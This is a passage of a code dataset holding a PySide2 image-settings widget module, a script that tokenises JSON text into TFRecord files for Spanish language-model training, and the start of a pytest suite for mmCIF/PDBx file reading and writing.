self.mode = LockUnlockWidget(toolTip = 'Lock image settings')\n self.brightness = ImageBrightness(layout=layout)\n self.contrast = ImageContrast(layout=layout)\n\n def _setConnections(self):\n self.brightness.valueChanged.connect(self._valueChanged)\n self.contrast.valueChanged.connect(self._valueChanged)\n\n def _setLayout(self):\n layout = QVBoxLayout()\n layout.setContentsMargins(0,0,0,0)\n layout.setSpacing(0)\n #layout.addWidget(self.mode)\n layout.addWidget(self.brightness)\n layout.addWidget(self.contrast)\n #self.setStyleSheet(\"background-color: white\")\n self.setLayout(layout)\n\n def _valueChanged(self):\n self.valueChanged.emit(self.getValue())\n\n def setData(self, array, center, width, set=None):\n min = np.amin(array)\n max = np.amax(array)\n if set is None:\n set = not self.mode.isLocked\n self.brightness.setData(min, max, center, set)\n self.contrast.setData(min, max, width, set)\n\n def getValue(self):\n return [\n self.brightness.getValue(),\n self.contrast.getValue(),\n ]\n\n def setValue(self, WindowCenter=None, WindowWidth=None):\n self.brightness.setValue(WindowCenter)\n self.contrast.setValue(WindowWidth)\n\n\nclass ImageContrast(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self, layout=True):\n super().__init__()\n\n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.contrast))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust Contrast\")\n self.spinBox.setMinimum(0)\n self.spinBox.setMaximum(1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n if layout:\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, width, set=True):\n self.spinBox.blockSignals(True)\n if width is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(width)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, value):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(value)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n width = max-min\n spinBoxStep = float(width / 10)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n \"\"\"Update Window Width of the image.\"\"\"\n width = self.spinBox.value() \n self.valueChanged.emit(width)\n\n\nclass ImageBrightness(QWidget):\n\n valueChanged = Signal(float)\n\n def __init__(self, layout=True):\n super().__init__() \n self.label = QLabel()\n self.label.setPixmap(QPixmap(icons.brightness))\n #self.label.setFixedSize(24, 24)\n self.spinBox = QDoubleSpinBox()\n self.spinBox.valueChanged.connect(self.spinBoxValueChanged)\n self.spinBox.setToolTip(\"Adjust Brightness\")\n self.spinBox.setMinimum(-1000000000.00)\n self.spinBox.setMaximum(+1000000000.00)\n self.spinBox.setWrapping(False)\n self.spinBox.setFixedWidth(115)\n if layout:\n self.layout = QHBoxLayout()\n self.layout.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.layout.setContentsMargins(0,0,0,0)\n self.layout.setSpacing(2)\n self.layout.addWidget(self.spinBox)\n self.layout.addWidget(self.label)\n #self.setMaximumWidth(120)\n self.setLayout(self.layout)\n\n def setData(self, min, max, center, set=True):\n self.spinBox.blockSignals(True)\n if min is None: \n self.spinBox.setValue(1) \n self.spinBox.setSingleStep(0.1)\n else:\n if set: # adjust spinbox value to image contrast\n self.spinBox.setValue(center)\n self.setSpinBoxStepSize(min, max)\n self.spinBox.blockSignals(False)\n\n def getValue(self):\n return self.spinBox.value()\n\n def setValue(self, center):\n self.spinBox.blockSignals(True)\n self.spinBox.setValue(center)\n self.spinBox.blockSignals(False)\n\n def setSpinBoxStepSize(self, min, max):\n if min is None:\n return\n center = (max+min)/2\n spinBoxStep = float(center / 10)\n self.spinBox.setSingleStep(spinBoxStep)\n\n def spinBoxValueChanged(self):\n center = self.spinBox.value()\n self.valueChanged.emit(center)\n\n\n\nclass LockUnlockWidget(QToolBar):\n\n toggled = Signal()\n\n def __init__(self, toolTip = 'Lock state'):\n super().__init__()\n self.isLocked = True\n self.icon_lock = QIcon(icons.lock) \n self.icon_lock_unlock = QIcon(icons.lock_unlock) \n self.mode = QAction()\n self.mode.setIcon(self.icon_lock)\n self.mode.setToolTip(toolTip)\n self.mode.triggered.connect(self.toggle) \n self.addAction(self.mode)\n\n def toggle(self):\n if self.isLocked == True:\n self.mode.setIcon(self.icon_lock_unlock)\n self.isLocked = False\n elif self.isLocked == False:\n self.mode.setIcon(self.icon_lock)\n self.isLocked = True \n self.toggled.emit()\n\n\n\nclass DeleteImageButton(QPushButton):\n\n buttonClicked = Signal()\n\n def __init__(self, image=None):\n super().__init__()\n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.bin_metal))\n self.setToolTip('Delete image')\n self.clicked.connect(self.delete) \n self.setData(image)\n\n def delete(self):\n if self.image is None:\n return\n self.image.remove()\n self.buttonClicked.emit()\n\n def setData(self, image):\n self.image = image\n\n\nclass ExportImageButton(QPushButton):\n\n def __init__(self, image=None):\n super().__init__()\n \n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.blue_document_export))\n self.setToolTip('Export as .png')\n self.clicked.connect(self.export)\n self.setData(image)\n\n def setData(self, image):\n self.image = image\n\n def export(self):\n \"\"\"Export as png.\"\"\"\n if self.image is None: \n return\n path = self.image.dialog.directory(\"Where do you want to export the data?\")\n self.image.export_as_png(path)\n\n\nclass RestoreImageButton(QPushButton):\n\n buttonClicked = Signal()\n\n def __init__(self, image=None):\n super().__init__()\n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.arrow_curve_180_left))\n self.setToolTip('Undo changes')\n self.clicked.connect(self.restore) \n self.setData(image)\n\n def setData(self, image):\n self.image = image\n\n def restore(self):\n if self.image is None: \n return\n self.image.restore()\n self.buttonClicked.emit()\n\n\nclass SaveImageButton(QPushButton):\n\n buttonClicked = Signal()\n\n def __init__(self, image=None):\n super().__init__()\n\n self.setFixedSize(24, 24)\n self.setIcon(QIcon(icons.disk))\n self.setToolTip('Save changes')\n self.clicked.connect(self.save) \n\n self.setData(image)\n\n def save(self):\n \n if self.image is None:\n return\n self.image.save()\n self.buttonClicked.emit()\n\n def setData(self, image):\n self.image = image\n\n", "sub_path": "src/wezel/widgets/dbimage.py", "file_name": "dbimage.py", "file_ext": "py", "file_size_in_byte": 15471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PySide2.QtWidgets.QWidget", "line_number": 40, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 43, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 71, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 99, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 101, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 106, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 107, "usage_type": "call"}, {"api_name": "wezel.icons.arrow_stop_090", "line_number": 107, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 107, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 109, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 119, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 120, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 120, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 120, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 159, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 161, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 165, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 166, "usage_type": "call"}, {"api_name": "wezel.icons.arrow_stop_270", "line_number": 166, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 166, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 168, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 178, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 179, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 179, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 179, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 218, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 221, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 254, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 271, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 273, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 278, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 279, "usage_type": "call"}, {"api_name": "wezel.icons.contrast", "line_number": 279, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 279, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 281, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 289, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 290, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 290, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 290, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QWidget", "line_number": 330, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 332, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 336, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QPixmap", "line_number": 337, "usage_type": "call"}, {"api_name": "wezel.icons.brightness", "line_number": 337, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 337, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QDoubleSpinBox", "line_number": 339, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 347, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.AlignLeft", "line_number": 348, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 348, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.AlignVCenter", "line_number": 348, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QToolBar", "line_number": 388, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 390, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 395, "usage_type": "call"}, {"api_name": "wezel.icons.lock", "line_number": 395, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 395, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 396, "usage_type": "call"}, {"api_name": "wezel.icons.lock_unlock", "line_number": 396, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 396, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QAction", "line_number": 397, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 414, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 416, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 421, "usage_type": "call"}, {"api_name": "wezel.icons.bin_metal", "line_number": 421, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 421, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 436, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 442, "usage_type": "call"}, {"api_name": "wezel.icons.blue_document_export", "line_number": 442, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 442, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 458, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 460, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 465, "usage_type": "call"}, {"api_name": "wezel.icons.arrow_curve_180_left", "line_number": 465, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 465, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QPushButton", "line_number": 480, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 482, "usage_type": "call"}, {"api_name": "PySide2.QtGui.QIcon", "line_number": 488, "usage_type": "call"}, {"api_name": "wezel.icons.disk", "line_number": 488, "usage_type": "attribute"}, {"api_name": "wezel.icons", "line_number": 488, "usage_type": "name"}]} +{"seq_id": "115759499", "text": "\"\"\"\n1 - Read TXT file with JSON string in each line\n2 - Read randomly given weights to each file\n3 - Tokenize and pack as .tfrecord files\n\"\"\"\nimport os\nimport re\nimport csv\nimport sys\nimport json\nimport random\nimport argparse\nimport tensorflow as tf\n\nfrom tokenizers import ByteLevelBPETokenizer\n\ncsv.field_size_limit(sys.maxsize)\n\n\nparser = argparse.ArgumentParser(description='SCRAPE!')\nparser.add_argument(\n '-fold',\n dest='fold',\n default=0,\n type=int,\n help='Which fold we are on'\n)\nparser.add_argument(\n '-num_folds',\n dest='num_folds',\n default=1,\n type=int,\n help='Number of folds (corresponding to both the number of training files and the number of testing files)',\n)\nparser.add_argument(\n '-seed',\n dest='seed',\n default=1337,\n type=int,\n help='which seed to use'\n)\nparser.add_argument(\n '-base_fn',\n dest='base_fn',\n default='news2016zh_',\n type=str,\n help='We will output files that are like {base_fn}_{n}.tfrecord for n in 0, ..., 1023'\n)\n\nparser.add_argument(\n '-input_fn',\n dest='input_fn',\n default='./dataset/',\n type=str,\n help='Path to dataset in json format. THIS MUST BE A LOCAL FILE.'\n)\nparser.add_argument(\n '-max_seq_length',\n dest='max_seq_length',\n default=10240,\n type=int,\n help='Max sequence length',\n)\n\nparser.add_argument(\n '-vocab_file',\n dest='vocab_file',\n default='../vocabs/spanish/vocab.json',\n type=str,\n help='Tokenizer vocab.json file.'\n)\nparser.add_argument(\n '-merges_file',\n dest='merges_file',\n default='../vocabs/spanish/merges.txt',\n type=str,\n help='Tokenizer merges.txt file.'\n)\n\nargs = parser.parse_args()\n\n\ndef create_int_feature(values):\n feature = tf.train.Feature(\n int64_list=tf.train.Int64List(value=list(values)))\n return feature\n\n\ntokenizer = ByteLevelBPETokenizer(args.vocab_file, args.merges_file, dropout=0.1)\n\nbiggest_file_line_count = int(args.input_fn.split(\",\")[0])\npaths = []\n\nfor path_repeat in args.input_fn.split(\",\")[1:]:\n splitted_path = path_repeat.split(\":\")\n path_dict = {\n \"path\": splitted_path[0],\n \"probability\": float(splitted_path[1]),\n \"file_size\": os.stat(splitted_path[0]).st_size,\n \"file\": open(splitted_path[0])\n }\n paths.append(path_dict)\n\n\ndef get_windows():\n for n in range(round(biggest_file_line_count / args.num_folds)):\n for path in paths: # For each path\n if random.random() < path[\"probability\"]: # Account for sampling frequency\n random_point = random.randint(0, path[\"file_size\"])\n path[\"file\"].seek(random_point)\n path[\"file\"].readline() # skip this line to clear the partial line\n line_str = path[\"file\"].readline()\n try:\n json_obj = json.loads(line_str)\n except json.decoder.JSONDecodeError:\n print(\"Json Error\")\n print(line_str)\n yield json_obj\n\n\ntrain_file = args.base_fn + 'train_windowed_{}.tfrecord'.format(args.fold)\ntrain_writer = tf.io.TFRecordWriter(train_file)\n\n\nfor window in get_windows():\n encoded_string = []\n for text in window:\n encoded_string.append(0) # Appending <|endoftext|> token\n text = re.sub(r'(\\W|\\w)\\n', r'\\1', text) # Clean line breaks\n encoded_string += tokenizer.encode(text).ids\n if len(encoded_string) < args.max_seq_length:\n print(\"Too short\")\n continue\n\n if random.random() > 0.5:\n encoded_string = encoded_string[:args.max_seq_length]\n else:\n encoded_string = encoded_string[len(encoded_string) - args.max_seq_length:]\n assert len(encoded_string) == args.max_seq_length, \"Window length {} is not equal to desired length {}\".format(len(encoded_string), args.max_seq_length)\n\n features = {\"input_ids\": create_int_feature(encoded_string)}\n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n train_writer.write(tf_example.SerializeToString())\n\ntrain_writer.close()\n", "sub_path": "dataset/prepare_data_esp.py", "file_name": "prepare_data_esp.py", "file_ext": "py", "file_size_in_byte": 4057, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "csv.field_size_limit", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 17, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.train.Feature", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Int64List", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tokenizers.ByteLevelBPETokenizer", "line_number": 89, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 99, "usage_type": "call"}, {"api_name": "random.random", "line_number": 108, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 109, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.io.TFRecordWriter", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 122, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 129, "usage_type": "call"}, {"api_name": "random.random", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.train.Example", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 142, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "233585278", "text": "\"\"\" Various tests cases for PDBx/mmCIF data file and dictionary reader and writer.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport pytest\n\ntry:\n from pathlib import Path\nexcept ImportError:\n from pathlib2 import Path\n\nfrom mmcif.api.DataCategory import DataCategory\nfrom mmcif.api.DataCategoryBase import DataCategoryBase\nfrom mmcif.api.PdbxContainers import DataContainer\nfrom mmcif.io.PdbxReader import PdbxReader\nfrom mmcif.io.PdbxWriter import PdbxWriter\n\nfrom six.moves import range\n\n__docformat__ = \"restructuredtext en\"\n__author__ = \"Igor Petrik\"\n__email__ = \"petrikigor@gmail.com\"\n__license__ = \"Apache 2.0\"\n\nclass TestPdbxReadWrite():\n __slots__ = ()\n\n @pytest.fixture()\n def rw_data(self, test_files, in_tmpdir):\n data = dict(pathPdbxDataFile = test_files / \"specialTestFile.cif\", \n pathBigPdbxDataFile = test_files / \"1ffk.cif\",\n pathOutputFile1 = Path(\"testOutputDataFile1.cif\"),\n pathOutputFile2 = Path(\"testOutputDataFile2.cif\"),\n pathOutputFile3 = Path(\"testOutputDataFileStopToken3.cif\"),\n pathOutputFile4 = Path(\"testOutputDataFile4.cif\"),\n pathOutputFile5 = Path(\"testOutputDataFile5.cif\"),\n pathTestFile = test_files / \"testSingleRow.cif\",\n pathTestFileStop = test_files / \"testFileWithStopTokens.cif\")\n return data\n\n def test_single_row(self, rw_data):\n myDataList = []\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(\"pdbx_seqtool_mapping_ref\")\n aCat.appendAttribute(\"ordinal\")\n aCat.appendAttribute(\"entity_id\")\n aCat.appendAttribute(\"auth_mon_id\")\n aCat.appendAttribute(\"auth_mon_num\")\n aCat.appendAttribute(\"pdb_chain_id\")\n aCat.appendAttribute(\"ref_mon_id\")\n aCat.appendAttribute(\"ref_mon_num\")\n aCat.appendAttribute(\"details\")\n aCat.append([1, 2, 3, 4, 5, 6, 7, 'data_my_big_data_file'])\n aCat.append([1, 2, 3, 4, 5, 6, 7, 'loop_my_big_data_loop'])\n aCat.append([1, 2, 3, 4, 5, 6, 7, 'save_my_big_data_saveframe'])\n aCat.append([1, 2, 3, 4, 5, 6, 7, '_category.item'])\n\n curContainer.append(aCat)\n\n bCat = curContainer.getObj(\"pdbx_seqtool_mapping_ref\")\n print(\"----attribute list %r\\n\" % bCat.getAttributeList())\n row = bCat.getRow(0)\n print(\"----ROW %r\\n\" % row)\n\n with open(str(rw_data['pathOutputFile2']), \"w\") as ofh:\n myDataList.append(curContainer)\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n\n assert len(myDataList) == 1\n\n def test_single_row_file(self, rw_data):\n myDataList = []\n with open(str(rw_data['pathTestFile']), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n\n myBlock = myDataList[0]\n myCat = myBlock.getObj('symmetry')\n print(\"----attribute list %r\\n\" % myCat.getAttributeList())\n row = myCat.getRow(0)\n print(\"----ROW %r\\n\" % row)\n #\n # myCat.dumpIt()\n\n with open(str(rw_data['pathOutputFile2']), \"w\") as ofh:\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n\n assert len(myDataList) == 1\n\n def test_row_list_initialization(self, rw_data):\n fn = rw_data['pathOutputFile4']\n attributeNameList = ['aOne', 'aTwo', 'aThree', 'aFour', 'aFive', 'aSix', 'aSeven', 'aEight', 'aNine', 'aTen']\n rowList = [[1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n ]\n nameCat = 'myCategory'\n\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(nameCat, attributeNameList, rowList)\n curContainer.append(aCat)\n\n myContainerList = []\n myContainerList.append(curContainer)\n ofh = open(str(fn), \"w\")\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myContainerList)\n ofh.close()\n\n myContainerList = []\n ifh = open(str(fn), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myContainerList)\n ifh.close()\n for container in myContainerList:\n for objName in container.getObjNameList():\n name, aList, rList = container.getObj(objName).get()\n print(\"Recovered data category %s\\n\" % name)\n print(\"Attribute list %r\\n\" % repr(aList))\n print(\"Row list %r\\n\" % repr(rList))\n assert len(myContainerList) == 1\n\n def test_write_data_file(self, rw_data):\n myDataList = []\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(\"pdbx_seqtool_mapping_ref\")\n aCat.appendAttribute(\"ordinal\")\n aCat.appendAttribute(\"entity_id\")\n aCat.appendAttribute(\"auth_mon_id\")\n aCat.appendAttribute(\"auth_mon_num\")\n aCat.appendAttribute(\"pdb_chain_id\")\n aCat.appendAttribute(\"ref_mon_id\")\n aCat.appendAttribute(\"ref_mon_num\")\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([1, 2, 3, 4, 5, 6, 7])\n aCat.append([7, 6, 5, 4, 3, 2, 1])\n curContainer.append(aCat)\n\n myDataList.append(curContainer)\n with open(str(rw_data['pathOutputFile1']), \"w\") as ofh:\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n assert len(myDataList) == 1\n\n def test_update_data_file(self, rw_data):\n myDataList = []\n\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(\"pdbx_seqtool_mapping_ref\")\n aCat.appendAttribute(\"ordinal\")\n aCat.appendAttribute(\"entity_id\")\n aCat.appendAttribute(\"auth_mon_id\")\n aCat.appendAttribute(\"auth_mon_num\")\n aCat.appendAttribute(\"pdb_chain_id\")\n aCat.appendAttribute(\"ref_mon_id\")\n aCat.appendAttribute(\"ref_mon_num\")\n aCat.append([9, 2, 3, 4, 5, 6, 7])\n aCat.append([10, 2, 3, 4, 5, 6, 7])\n aCat.append([11, 2, 3, 4, 5, 6, 7])\n aCat.append([12, 2, 3, 4, 5, 6, 7])\n\n curContainer.append(aCat)\n myDataList.append(curContainer)\n ofh = open(str(rw_data['pathOutputFile1']), \"w\")\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n ofh.close()\n\n myDataList = []\n ifh = open(str(rw_data['pathOutputFile1']), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n ifh.close()\n myBlock = myDataList[0]\n myCat = myBlock.getObj('pdbx_seqtool_mapping_ref')\n for iRow in range(0, myCat.getRowCount()):\n myCat.setValue('some value', 'ref_mon_id', iRow)\n myCat.setValue(100, 'ref_mon_num', iRow)\n\n with open(str(rw_data['pathOutputFile2']), \"w\") as ofh:\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myDataList)\n\n assert len(myDataList) == 1\n\n def test_read_data_file(self, rw_data):\n myDataList = []\n ifh = open(str(rw_data['pathPdbxDataFile']), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n ifh.close()\n assert len(myDataList) == 1\n\n def test_read_write_data_file(self, rw_data):\n myDataList = []\n with open(str(rw_data['pathPdbxDataFile']), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n\n with open(str(rw_data['pathOutputFile1']), \"w\") as ofh:\n pWr = PdbxWriter(ofh)\n pWr.write(myDataList)\n assert len(myDataList) == 1\n\n def test_read_write_list_accessors(self, rw_data):\n dc = DataCategoryBase('test', attributeNameList=['a', 'b', 'c', 'd'])\n\n dc.append([1, 2, 3, 4])\n dc.append([1, 2, 3, 4])\n dc.append([1, 2, 3, 4])\n dc.append([1, 2, 3, 4, 5, 6, 7])\n dc.append([1, 2, 3, 4])\n\n dc.insert(0, [4, 3, 2, 1])\n\n print(\"Full %r\\n\" % dc)\n print(\"slice %r\\n\" % dc[2:4])\n print(\"last %r\\n\" % dc[-1])\n\n for r in dc:\n print(\"row data %r\\n\" % r)\n\n dc.setMapping('ATTRIBUTE')\n for r in dc:\n print(\"row attrib dict %r\\n\" % r)\n\n dc.setMapping('ITEM')\n for r in dc:\n print(\"row item dict %r\\n\" % r)\n\n dc.setMapping('DATA')\n\n print(\"row 3 %r\\n\" % dc[3])\n tmp = dc[3]\n dc[3] = []\n print(\"row 3 %r\\n\" % dc[3])\n dc[3] = tmp\n print(\"row 3 %r\\n\" % dc[3])\n\n dc.setMapping('ATTRIBUTE')\n tmp = dc[3]\n\n dt = {}\n for k, v in tmp.items():\n dt[k] = 10000\n print(\"row dict %r\\n\" % dt)\n\n dc[3] = dt\n print(\"row 3%r\\n\" % dc[3])\n dc[3] = tmp\n\n dc.setMapping('ITEM')\n tmp = dc[3]\n\n dt = {}\n for k, v in tmp.items():\n dt[k] = 10001\n print(\"row dict %r\\n\" % dt)\n\n dc[3] = dt\n print(\"row 3 %r\\n\" % dc[3])\n\n print(\"print raw %r\\n\" % dc)\n print(\"print string %s\\n\" % dc)\n\n def test_update_attribute(self, rw_data):\n ifn = rw_data['pathBigPdbxDataFile']\n ofn = rw_data['pathOutputFile2']\n myContainerList = []\n with open(str(ifn), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myContainerList)\n #\n dsId = \"D_000000\"\n atName = 'entry_id'\n for container in myContainerList:\n container.setName(dsId)\n # remove category citation\n container.remove('citation')\n for objName in container.getObjNameList():\n dcObj = container.getObj(objName)\n if dcObj.hasAttribute(atName):\n for iRow in range(0, dcObj.getRowCount()):\n dcObj.setValue(dsId, attributeName=atName, rowIndex=iRow)\n elif objName.lower() == 'entry':\n dcObj.setValue(dsId, attributeName='id', rowIndex=0)\n\n #\n with open(str(ofn), \"w\") as ofh:\n pWr = PdbxWriter(ofh)\n pWr.write(myContainerList)\n assert len(myContainerList) == 1\n\n def test_read_write_data_file_stop(self, rw_data):\n myDataList = []\n with open(str(rw_data['pathTestFileStop']), \"r\") as ifh:\n pRd = PdbxReader(ifh)\n pRd.read(myDataList)\n\n with open(str(rw_data['pathOutputFile3']), \"w\") as ofh:\n pWr = PdbxWriter(ofh)\n pWr.write(myDataList)\n assert len(myDataList) == 1\n\n def test_row_dict_initialization(self, rw_data):\n rLen = 10\n fn = rw_data['pathOutputFile5']\n attributeNameList = ['a', 'b', 'c', 'd']\n rowList = [{'a': 1, 'b': 2, 'c': 3, 'd': 4} for i in range(rLen)]\n nameCat = 'myCategory'\n #\n #\n curContainer = DataContainer(\"myblock\")\n aCat = DataCategory(nameCat, attributeNameList, rowList)\n aCat.append({'a': 1, 'b': 